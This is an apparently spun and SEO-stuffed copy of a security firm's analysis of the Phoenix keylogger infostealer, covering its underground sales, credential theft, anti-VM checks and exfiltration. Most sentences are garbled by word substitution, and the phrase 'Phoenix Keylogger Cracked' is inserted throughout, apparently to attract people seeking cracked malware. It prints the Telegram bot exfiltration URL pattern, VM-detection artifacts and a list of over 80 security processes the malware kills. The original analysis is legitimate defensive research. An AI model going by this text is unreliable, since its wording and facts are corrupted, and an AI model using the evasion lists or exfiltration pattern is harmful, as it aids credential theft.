Cybereason’s Nocturnus team is tracking a new Phoenix Keylogger Cracked gaining traction amongst cybercriminals referred to as Phoenix. The keylogger first emerged in July 2019 filled with a myriad of statistics-stealing features.

Those functions expand past entirely Phoenix Keylogger Cracked:

logging keystrokes, to the factor in which we’re inclined to categorise it as an infostealer This studies explains numerous aspects of the Phoenix Keylogger Cracked, which include:

A check out the Underground community Phoenix Keylogger Cracked:

The underground, ongoing advertising efforts to sell Phoenix and its reception within the underground community A Technical Breakdown: A technical breakdown of the Phoenix keylogger, including info stealing abilities, communique via Telegram, and ability staying power Phoenix Keylogger Cracked.

the relationship to a previous Keylogger: the discovery of the Phoenix Keylogger Cracked connection to the “orphaned” Alpha keylogger.
KEY FINDINGS
The Phoenix Keylogger: The Cybereason Nocturnus crew is investigating more than one incidents of a brand new, emerging keylogger called Phoenix, and is now capable of offer info into the keylogger’s operations and its writer Phoenix Keylogger Cracked.

Steals information From more than one resources Phoenix Keylogger Cracked:

Phoenix operates underneath a malware-as-a-provider model and steals private data from almost 20 different browsers, four one of a kind mail clients, FTP clients, and chat customers Phoenix Keylogger Cracked.

attempts to prevent over 80 security products: On pinnacle of its records stealing features, Phoenix Keylogger Cracked has numerous defensive and evasive mechanisms to keep away from evaluation and detection, along with an Anti-AV module that attempts to kill the approaches of over 80 unique protection merchandise and analysis tools.

targets throughout Continents: no matter Phoenix having been launched in July 2019, it has already targeted sufferers across North america, the UK, France, Germany and different elements of Europe and the center East. We count on extra areas to be affected as it profits popularity Phoenix Keylogger Cracked.

Exfiltrates data thru Telegram: Phoenix gives not unusual SMTP and FTP exfiltration protocols, however additionally supports statistics exfiltration over Telegram. Telegram, a popular chat utility worldwide, is leveraged by means of cybercriminals for its legitimacy and stop-to-quit encryption Phoenix Keylogger Cracked.

Has the equal writer as the Alpha Keylogger: Phoenix was clearly authored by using the same group in the back of the Alpha keylogger, which disappeared earlier this yr.
“Malware for the people”: This research showcases the ever-growing recognition of the Malware-as-a-service version within the cybercrime atmosphere. Malware authors are growing malware that is easy for any consumer to perform and springs bundled with customer service and a aggressive price factor. As we flow into 2020, we count on to see many much less-technical cybercriminals leverage MaaS to devote cybercrime, specifically as MaaS authors start to compete for the maximum awesome offering Phoenix Keylogger Cracked.

Superior endpoint safety systems Phoenix Keylogger Cracked:

cope with these varieties of assaults. study the future of EPPs throughout our webinar history PHOENIX KEYLOGGER at the stop of July 2019, the Cybereason platform detected a malware sample that became labeled by some antivirus companies as Agent Tesla. Upon similarly review, however, it have become clear that this was now not Agent Tesla. We were capable of decide this malware became a very new and previously undocumented malware called the Phoenix Keylogger Cracked.

Phoenix Keylogger Cracked MaaS version Pricing:

Phoenix up to date MaaS model pricing.

In looking underground groups, we learned that Phoenix first emerged at the quit of July in 2019. This keylogger follows the malware as a carrier (MaaS) model and is offered for $14.99-$25.00 in line with month via a network member with the deal with illusion .

illusion’s be a part of phantasm joined the underground network on the quit of July 2019 and straight away started advertising and marketing the keylogger. This behavior is incredibly unusual, as the underground network normally enforces a strict vetting manner for contributors Phoenix Keylogger Cracked.

RECEPTION inside the UNDERGROUND community
rapidly after its launch, the Phoenix keylogger caught the attention of the underground network, with severa participants expressing hobby in checking out the product. The underground community perspectives Phoenix quite favorably because of its stealing talents, balance, clean person interface, and customer support.

instance #1: extraordinarily person friendly WITH DOCUMENTATION Phoenix Keylogger Cracked.

This cybercriminal’s overview expresses how smooth Phoenix is to use. The in-intensity evaluation discusses documentation, fee, password recovery, and more – all items which might be important to keeping any Phoenix Keylogger Cracked.

COMES WITH A user guide AND pleasant

This cybercriminal’s review expresses how Phoenix Keylogger Cracked comes with a user guide and pleasant customer service. in particular, they country how the owner of Phoenix is extra than inclined to help users if they have questions.

instance #3: a hundred and one% help TO customers

persisted validation of the quality customer support the proprietor of Phoenix Keylogger Cracked gives.

phantasm’s response to a request for functions and latest updates to the changelog.

opinions of the Phoenix keylogger draw a stark evaluation with some Phoenix Keylogger Cracked merchandise sold in hacker boards. They reward phantasm’s customer support and effective mind-set towards the consumer, in preference to others inside the underground network who view their customers completely as coins-cows.

those advantageous critiques recommend Phoenix’s potential for full-size use within the destiny. Like many modern-day MaaS, Phoenix offers non-technical and technical customers alike easy get entry to to adverse and exploitative software program through the proverbial swipe of a credit score card. Phoenix Keylogger Cracked is in addition proof of our ongoing perception that modern-day MaaS is developing a new organization of cybercriminals that income off of other, much less technical cybercriminals.

in addition, Phoenix suggests how some cybercriminals are following some of the identical methodologies as valid software-as-a-carrier (SaaS) organizations: advertising efforts, counting on tremendous opinions, responsive customer support, and regularly enhancing functions of their product are hallmarks of a worthwhile SaaS Phoenix Keylogger Cracked.

MALWARE evaluation Phoenix Keylogger Cracked:

MALWARE abilities The Phoenix Keylogger Cracked is written in has a number of functions that amplify some distance beyond keylogging, consisting of:

Keylogger + Clipboard Stealer
display seize
Password Stealing (Browsers, Mail customers, FTP customers, Chat clients)
statistics exfiltration thru SMTP, FTP or Telegram
Downloader (to down load additional malware)
Alleged AV-Killer Module
Anti-debugging and Anti-VM features
transport approach Phoenix Keylogger Cracked.

through default, illusion elements the Phoenix Keylogger Cracked:

to their customers as a stub. The buyer must use their very own strategies to supply the stub to the target system. most of the people of Phoenix infections we study originate from phishing tries that leverage a weaponized rich textual content record (RTF) or Microsoft office record. these deliveries do now not use the greater popular malicious macro method, but alternatively use regarded exploits. most generally, they exploit the Equation Editor vulnerability Phoenix Keylogger Cracked

process tree of the Phoenix contamination using a weaponized report inflamed gadget PROFILING as soon as Phoenix effectively infects the goal device, it profiles the machine to acquire facts on the operating device, hardware, strolling techniques, customers, and its external IP. Phoenix stores the records in memory and sends it back to the attackers immediately, without writing it to disk. Attackers generally try this to be greater stealthy, in view that it’s miles tougher to recognise what became exfiltrated if it isn’t written to disk Phoenix Keylogger Cracked.

Instance of machine profiling information Phoenix Keylogger Cracked to the attackers.

ANTI-analysis & ANTI-DETECTION features It’s clean illusion invested time and effort into protecting Phoenix, as the stub makes use of some distinct techniques to guard itself from inspection.

String Encryption: most essential strings used by the malware are encrypted and most effective decrypted in reminiscence Phoenix Keylogger Cracked.
Obfuscation:The stub is obfuscated by means of what seems to be an implementation of the open source ConfuserEx .net obfuscator to avoid accurate decompilation and code inspection.
illusion recommends the use of an extra 1/3-birthday celebration crypter to “make it FUD”, or fully undetectable. it’s far really worth noting that maximum Phoenix samples stuck in the wild are filled with a crypter, however are nonetheless avoided through most of the people of antivirus companies.

After obtaining primary machine records, Phoenix exams to see if it’s miles running in a “adverse” environment. A antagonistic environment can take exceptional paperwork: if Phoenix is deployed in a virtual gadget, debugger, or on a machine with evaluation gear or antivirus products mounted. Phoenix has a fixed of functions to disable special home windows equipment in the admin panel, like disabling CMD, the registry, undertaking manager, system repair, and others Phoenix Keylogger Cracked.

it is exciting to observe that despite the fact that the person interface utilized by Phoenix Keylogger Cracked operators appears to have support for a staying power function, maximum samples analyzed by means of Cybereason did no longer show off patience behavior following a successful contamination. a possible rationalization to this can lie inside the attackers’ want to reduce the hazard of over publicity. once Phoenix obtained the essential statistics, there may be no want for it to increase the chance of exposure via persisting longer than wanted.

The Phoenix keylogger admin panel, with features to disable specific gear.

let’s dive into some of the strategies Phoenix uses to hit upon a “adverse” surroundings.

Anti-VM Module
most of Phoenix’s anti-VM exams are primarily based on known strategies. Given the tests used and their order, we trust they have been most likely replica-pasted from the Cyberbit weblog. Phoenix plays the tests and terminates itself if it discovers any of the subsequent processes or files in the goal system.

Phoenix Keylogger Cracked checking for numerous strolling tactics.

Checking for running methods:
SandboxieRpcSs
Vmtoolsd
Vmwaretrat
Vmwareuser
Vmacthlp
Vboxservice
Vboxtray
Checking for the existence of the following documents:
c:windowsSystem32DriversVBoxMouse.sys
c:windowsSystem32Driversvm3dgl.dll
c:windowsSystem32Driversvmtray.dll
c:windowsSystem32DriversVMToolshook.dll
c:windowsSystem32Driversvmmousever.dll
c:windowsSystem32DriversVBoxGuest.sys
c:windowsSystem32DriversVBoxSF.sys
c:windowsSystem32DriversVBoxVideo.sys
c:windowsSystem32VBoxService.exe

Disabling home windows Defender Phoenix Keylogger Cracked:

Phoenix Keylogger Cracked attempts to disable the windows Defender Anti Spyware module via changing the subsequent registry key.

Phoenix Keylogger Cracked tries to disable home windows Defender Antispyware.

Anti-AV Module
Phoenix’s anti-AV module tries to terminate the system of a tremendous wide variety of protection products.

Phoenix terminating the process of different security merchandise.

security merchandise Phoenix attempts to Terminate:

zlclient, egui, bdagent, npfmsg, olydbg, anubis, wireshark, avastui, _Avp32, vsmon, mbam, keyscrambler, _Avpcc, _Avpm, Ackwin32, Outpost, Anti-Trojan, ANTIVIR, Apvxdwin, ATRACK, Autodown, Avconsol, Ave32, Avgctrl, Avkserv, Avnt, Avp, Avp32, Avpcc, Avpdos32, Avpm, Avptc32, Avpupd, Avsched32, AVSYNMGR, Avwin95, Avwupd32, Blackd, Blackice, Cfiadmin, Cfiaudit, Cfinet, Cfinet32, Claw95, Claw95cf, cleanser, Cleaner3, Defwatch, Dvp95, Dvp95_0, Ecengine, Esafe, Espwatch, F-Agnt95, Findviru, Fprot, F-Prot, F-Prot95, Fp-Win, Frw, F-Stopw, Iamapp, Iamserv, Ibmasn, Ibmavsp, Icload95, Icloadnt, Icmon, Icsupp95, Icsuppnt, Iface, Iomon98, Jedi, Lockdown2000, Lookout, Luall, MCAFEE, Moolive, Mpftray, N32scanw, NAVAPSVC, NAVAPW32, NAVLU32, Navnt, NAVRUNR, Navw32, Navwnt, NeoWatch, NISSERV, Nisum, Nmain, Normist, NORTON, Nupgrade, Nvc95, Outpost, Padmin, Pavcl, Pavsched, Pavw, PCCIOMON, PCCMAIN, Pccwin98, Pcfwallicon, Persfw, POP3TRAP, PVIEW95, Rav7, Rav7win, Rescue, Safeweb, Scan32, Scan95, Scanpm, Scrscan, Serv95, Smc, SMCSERVICE, laugh, Sphinx, Sweep95, SYMPROXYSVC, Tbscan, Tca, Tds2-98, Tds2-Nt, TermiNET, Vet95, Vettray, Vscan40, Vsecomr, Vshwin32, Vsstat, Webscanx, WEBTRAP, Wfindv32, Zonealarm, LOCKDOWN2000, RESCUE32, LUCOMSERVER, avgcc, avgcc, avgamsvr, avgupsvc, avgw, avgcc32, avgserv, avgserv9, avgserv9schedapp, avgemc, ashwebsv, ashdisp, ashmaisv, ashserv, aswUpdSv, symwsc, norton, Norton vehicle-defend, norton_av, nortonav, ccsetmgr, ccevtmgr, avadmin, avcenter, avgnt, avguard, avnotify, avscan, guardgui, nod32krn, nod32kui, clamscan, clamTray, clamWin, freshclam, oladdin, sigtool, w9xpopen, Wclose, cmgrdian, alogserv, mcshield, vshwin32, avconsol, vsstat, avsynmgr, avcmd, avconfig, licmgr, sched, preupd, MsMpEng, MSASCui, Avira.Systray

PHOENIX’S middle STEALING capability
once Phoenix finishes checking for a hostile surroundings, it executes numerous special stealing modules.

CREDENTIAL STEALING
Phoenix attempts to scouse borrow credentials and different touchy information saved regionally on the goal device by way of looking for specific documents or registry keys that incorporate sensitive facts. It searches browsers, mail customers, FTP customers, and chat customers.

Chrome, Firefox, Opera, Vivaldi, courageous, Blisk, Epic, Avast browser, SRware Iron, Comodo, Torch, Slimjet, UC browser, Orbitum, Coc Coc, QQ Browser, 360 Browser, Liebao

Mail customers

Outlook, Thunderbird, Seamonkey, Foxmail

FTP patron

Filezilla

Chat clients

Pidgin

Excerpt from Phoenix’s Outlook module

Excerpt from Phoenix Keylogger Cracked Pidgin module:

KEYLOGGER MODULE
Phoenix uses a not unusual technique of hooking keyboard activities for its keylogging. It uses a home windows API function SetWindowsHookExA to map the pressed keys, then fits them to the corresponding technique.

Excerpt from Phoenix’s keylogger hooking feature.

Phoenix keylogger functionality matching keystrokes to the relevant process.

network & C2 communication
Phoenix tests for net connectivity and obtains the external IP deal with of the target machine by sending a GET HTTP request to ifconfig.me, a acknowledged net service. This service gives Phoenix the external IP cope with of the target device, or terminates itself if there is no internet connectivity.

Phoenix determines the external IP of an inflamed system the use of a valid net provider

Phoenix can submit stolen information in cleartext over SMTP, FTP, or Telegram.

SMTP communique & EXFILTRATION
For most of the people of cases, Phoenix posts the stolen information using the SMTP protocol. The stolen facts is despatched as an e-mail to an email cope with controlled through the attacker.

Stolen browser statistics exfiltrated as an electronic mail message.

TELEGRAM conversation & EXFILTRATION Phoenix Keylogger Cracked.

as a substitute, in some instances Phoenix exfiltrates information via abusing the API of the popular Telegram chat software. This approach of exfiltration is quite stealthy, because it abuses Telegram’s valid infrastructure. different malware have also started out to use this approach, including the Masad Stealer.

Phoenix sends an HTTP request to Telegram’s chat bot. This request includes the Telegram API key, chat identification, and the stolen records is handed via the text parameter in URL encoding Phoenix Keylogger Cracked.

HTTP request despatched to Telegram’s API extracted from memory.

https://api[.]telegram[.]org/bot[ID]:[API_Token]/sendMessage?chat_id=[ID]&textual content=[URL_ENCODED_TEXT]
Telegram HTTP request sample utilized by Phoenix

URL decoded textual content published to a Telegram bot.

The Telegram bot responds with the subsequent details Phoenix Keylogger Cracked.

{“ok”:proper,”result”:{“message_id”:[redacted],”from”:{“identity”:[redacted],”is_bot”:genuine,”first_name”:”[redacted]”,”username”:”[redacted]”},”chat”:{“identification”:[redacted],”first_name”:”[redacted]”,”last_name”:”[redacted]”,”type”:”private”},”date”:[redacted],”text”:”}
The stolen data is handed thru Telegram, permitting the user to leverage a valid software for malicious verbal exchange and exfiltration.

extra verbal exchange WITH THE C2 SERVER
At its current stage of improvement, Phoenix does no longer appear to use a general, interactive C2 version. specifically, it doesn’t expect to receive commands back from the C2 server. Phoenix’s various obligations like infostealing, downloading extra malware, and spreading thru USB are predefined by means of the operators in the configuration report before compilation. Phoenix uses a predefined exfiltration method from the configuration file to thieve any accumulated records on execution.

CONNECTING TO ALPHA KEYLOGGER
all through our investigation, we observed the Phoenix Keylogger Cracked is genuinely an evolution of an earlier venture, Alpha keylogger. We believe the Alpha keylogger changed into authored by using the identical team behind the Phoenix keylogger.

CODE SIMILARITY among ALPHA AND PHOENIX KEYLOGGER
in order to investigate deeper, we used YARA policies and different techniques to retrieve extra samples of Phoenix. one of the samples we retrieved become almost equal to Phoenix, with a few parts copy-pasted with the equal naming conventions, parameter names, and greater. however, the name of the malware as it appeared in logs and in code, became continuously Alpha keylogger.

SIMILARITIES between data SCHEMES

Alpha Keylogger purchaser data Scheme

Phoenix Keylogger consumer information Scheme

SIMILARITIES between SMTP CONFIGURATIONS

Phoenix Keylogger SMTP Configuration

Alpha Keylogger SMTP Configuration

SIMILARITIES between SMTP functions

Phoenix Keylogger SMTP function

Alpha Keylogger SMTP characteristic

SIMILARITIES among SELF-TERMINATION features

Phoenix Keylogger Cracked Self-termination function

Alpha Keylogger Self-termination characteristic

ALPHA KEYLOGGER overview Phoenix Keylogger Cracked:

In looking the underground communities, we found references to the Alpha keylogger beginning as early as April of 2019. At that time, member Alpha_Coder and later, member AK_Generation, began advertising the keylogger to the underground community Phoenix Keylogger Cracked.

Alpha keylogger launched in April 2019 through Alpha_Coder.

In reviewing Alpha_Coder’s marketing substances, it’s miles clean the two keyloggers are related. They proportion the exact same features, and the description of the features makes use of the exact equal phraseology or even font.

Phoenix Keylogger Cracked marketing

Alpha Keylogger advertising

in addition, the design of the admin panel for the Alpha keylogger could be very just like the layout of the admin panel for the Phoenix keylogger.

Alpha Phoenix Keylogger Cracked Admin Panel

Phoenix Keylogger Admin Panel

DISAPPEARANCE OF ALPHA, EMERGENCE OF PHOENIX
inside the starting of July 2019, the 2 contributors answerable for marketing the Alpha keylogger went completely silent. This took place simply earlier than the emergence of the Phoenix keylogger on the cease of July 2019.

The ultimate message via Alpha_Coder from the beginning of July 2019.

A potential buyer wonders whether the Alpha keylogger continues to be available.

whilst it isn’t completely clean why the Alpha keylogger turned into all at once close down, chatter within the promoting thread offers away capability clues. Alpha_Coder become banned from posting within the discussion board for one month, for reasons unknown. during that point, AK_Generation led advertising efforts for the Alpha keylogger.

AK_Generation marketing the Alpha keylogger.

AK_Generation was created on April 27, 2019, the identical day the Alpha keylogger became first promoted by means of Alpha_Coder. apparently, AK_Generation also disappeared near the launch date of the Phoenix keylogger. it is in all likelihood that Alpha_Coder and AK_Generation are operated by way of the identical man or woman, and that AK_Generation became created as a backup account for Alpha_Coder.

The ultimate time AK_Generation became visible at the underground network.

We trust the Phoenix keylogger is not just an evolution of the Alpha keylogger, however additionally an try to rebrand and deliver the writer a smooth slate in the underground network.

conclusion
This studies breaks down the Phoenix keylogger, an information stealer running beneath a malware-as-a-provider version, presently under lively improvement. given that its emergence in late July 2019, it has won reputation within the underground network due to its ease of use, competitive pricing, and personal customer service.

Phoenix Keylogger Cracked is more than just a keylogger, with extensive records-stealing capabilities, self-defense mechanisms, which include an anti-AV module that tries to forestall over eighty protection merchandise, and the capacity to exfiltrate information thru Telegram. most people of samples we identified inside the wild do no longer put in force a endurance mechanism, nor do they have interaction bidirectionally with the C2 server. as an alternative, the stolen records is published to a pre-configured exfiltration technique, which shows Phoenix is getting used commonly as a “set it and overlook it” type of malware.

primarily based on our analysis, Phoenix Keylogger Cracked malware-as-a-carrier:

model appeals to a wide range of cybercriminals, specially the less state-of-the-art who do not possess the technical know-a way to broaden their very own a hit malware infrastructure. This signals a persisted trend of cybercriminals following the malware-as-a-service model to make malware accessible for any stage consumer. Malware authors are beginning to apply a few of the identical methodologies as valid software-as-a-provider agencies, inclusive of advertising their software program, personalised customer service, and an clean user interface to continuously income off of other, less technical cybercriminals Phoenix Keylogger Cracked.

entering into 2020, we assume a proliferation of much less-technical cybercriminals to leverage MaaS to goal, steal, and damage individuals, specifically as MaaS authors upload additional functions to their offerings Phoenix Keylogger Cracked.

Sources